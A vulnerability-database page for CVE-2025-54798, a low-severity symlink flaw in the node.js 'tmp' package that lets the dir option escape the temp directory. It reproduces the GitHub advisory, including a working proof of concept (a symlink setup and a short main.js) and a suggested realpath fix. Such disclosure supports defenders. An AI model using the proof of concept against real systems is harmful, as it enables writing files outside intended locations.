CVE-2025-54798
LOW
Published 2025-08-07T00:04:35.370Z
Actions:
Expert Analysis
Professional remediation guidance
Get tailored security recommendations from our analyst team for CVE-2025-54798. We'll provide specific mitigation strategies based on your environment and risk profile.
CVSS Score
V3.1
2.5
/10
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
Base Score Metrics
Exploitability: N/A
Impact: N/A
Attack Vector Metrics
Impact Metrics
Description
tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.
Available Exploits
No exploits available for this CVE.
Related News
No news articles found for this CVE.
EU Vulnerability Database
Monitored by ENISA for EU cybersecurity
ENISA Analysis
tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.
Affected Products (ENISA)
raszi
node-tmp
ENISA Scoring
CVSS Score (3.1)
2.5
/10
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
EPSS Score
0.020
probability
ENISA References
Data provided by ENISA EU Vulnerability Database. Last updated: August 7, 2025
GitHub Security Advisories
Community-driven vulnerability intelligence from GitHub
✓ GitHub Reviewed
LOW
tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter
GHSA-52f5-9888-hmc6Advisory Details
### Summary
`[email protected]` is vulnerable to an Arbitrary temporary file / directory write via symbolic link `dir` parameter.
### Details
According to the documentation there are some conditions that must be held:
```
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
```
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because `_resolvePath` does not properly handle symbolic link when resolving paths:
```js
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
```
If the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it's possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:
```js
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
```
### PoC
The following PoC demonstrates how writing a tmp file on a folder outside the `tmpDir` is possible.
Tested on a Linux machine.
- Setup: create a symbolic link inside the `tmpDir` that points to a directory outside of it
```bash
mkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
```
- check the folder is empty:
```bash
ls -lha $HOME/mydir1 | grep "tmp-"
```
- run the poc
```bash
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
```
- the temporary file is created under `$HOME/mydir1` (outside the `tmpDir`):
```bash
ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
```
- `main.js`
```js
// npm i [email protected]
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
```
A Potential fix could be to call `fs.realpathSync` (or similar) that resolves also symbolic links.
```js
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
```
### Impact
Arbitrary temporary file / directory write via symlink
Affected Packages
npm
tmp
ECOSYSTEM:
≥0
<0.2.4
CVSS Scoring
CVSS Score
2.5
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
References
Advisory provided by GitHub Security Advisory Database. Published: August 6, 2025, Modified: August 7, 2025
Social Media Intelligence
Real-time discussions and threat intelligence from social platforms
Reddit
•
5 days, 18 hours ago
michaelpaoli
Debian 13.1 (and 12.12) 2025-09-06 "Just" a "minor" point release. But for those that have been waiting to upgrade to Debian 13, perhaps that time now draws nearer? [\[SUA 273-1\] Upcoming Debian 13 Update (13.1)](https://lists.debian.org/debian-stable-announce/2025/09/msg00000.html) [\[SUA 274-1\] Upcoming Debian 12 Update (12.12)](https://lists.debian.org/debian-stable-announce/2025/09/msg00001.html) 13.1: >\[SUA 273-1\] Upcoming Debian 13 Update (13.1) …
Also mentions:
CVE-2025-7039
CVE-2025-40927
CVE-2025-9185
CVE-2025-9181
CVE-2025-47806
CVE-2025-47219
CVE-2025-47807
CVE-2025-47808
CVE-2025-53859
CVE-2025-50952
CVE-2025-54874
CVE-2025-54350
CVE-2025-54349
CVE-2025-27613
CVE-2025-27614
CVE-2025-20260
CVE-2025-23048
CVE-2025-46835
CVE-2025-49812
CVE-2025-49630
CVE-2025-53019
CVE-2025-53101
CVE-2025-53020
CVE-2025-8058
CVE-2024-42516
CVE-2024-43394
CVE-2024-43204
CVE-2024-47252
CVE-2025-6965
CVE-2025-7394
CVE-2025-7783
CVE-2025-53015
CVE-2025-53014
CVE-2025-48385
CVE-2025-48384
CVE-2024-25178
CVE-2024-25177
CVE-2024-25176
CVE-2025-4748
CVE-2024-6174
CVE-2024-11584
CVE-2025-6170
CVE-2025-49794
CVE-2025-49796
CVE-2025-6021
CVE-2025-5916
CVE-2025-5915
CVE-2025-5914
CVE-2025-5917
CVE-2025-49133
CVE-2025-48387
CVE-2025-27553
CVE-2025-27773
CVE-2025-48734
CVE-2025-46712
CVE-2025-46393
CVE-2025-46398
CVE-2025-46397
CVE-2025-47203
CVE-2023-52970
CVE-2023-26819
CVE-2025-40908
CVE-2025-40909
CVE-2025-4373
CVE-2023-53154
CVE-2025-2784
CVE-2025-48060
CVE-2025-47273
CVE-2025-4802
CVE-2025-46399
CVE-2025-46400
CVE-2025-46337
CVE-2025-32050
CVE-2025-46421
CVE-2025-46420
CVE-2025-43965
CVE-2025-43964
CVE-2025-43963
CVE-2025-43962
CVE-2025-43961
CVE-2025-3818
CVE-2025-32906
CVE-2025-32912
CVE-2025-32911
CVE-2025-30722
CVE-2025-30693
CVE-2025-3576
CVE-2025-32910
CVE-2025-32909
CVE-2025-32913
CVE-2025-32053
CVE-2025-32052
CVE-2025-32051
CVE-2024-12905
CVE-2025-30472
CVE-2024-6866
CVE-2024-6844
CVE-2024-6839
CVE-2024-8176
CVE-2023-52971
CVE-2023-52969
CVE-2025-27516
CVE-2025-27221
CVE-2022-37660
CVE-2024-56161
CVE-2025-20128
CVE-2025-23016
CVE-2024-34703
CVE-2024-34702
CVE-2024-45236
CVE-2024-45234
CVE-2024-45235
CVE-2024-45238
CVE-2024-45237
CVE-2024-45239
CVE-2024-0962
CVE-2024-10525
CVE-2024-31031
CVE-2024-38875
CVE-2024-57822
CVE-2024-57823
CVE-2024-3935
CVE-2024-42005
CVE-2024-39330
CVE-2024-39329
CVE-2024-39917
CVE-2024-39312
CVE-2024-39614
CVE-2024-52532
CVE-2024-52530
CVE-2024-52531
CVE-2024-33899
CVE-2024-50602
CVE-2024-50624
CVE-2024-50383
CVE-2024-50612
CVE-2024-5569
CVE-2024-49768
CVE-2024-49769
CVE-2024-1681
CVE-2024-41991
CVE-2024-41990
CVE-2024-41989
CVE-2024-8376
CVE-2023-36053
CVE-2023-31484
CVE-2023-28755
CVE-2023-28366
CVE-2023-42822
CVE-2023-52425
CVE-2023-40184
CVE-2022-33065
CVE-2021-46312
CVE-2021-46310
CVE-2021-25743
CVE-2019-25211
70
8
86.0
References
Published: 2025-08-07T00:04:35.370Z
Last Modified: 2025-08-07T00:04:35.370Z
Copied to clipboard!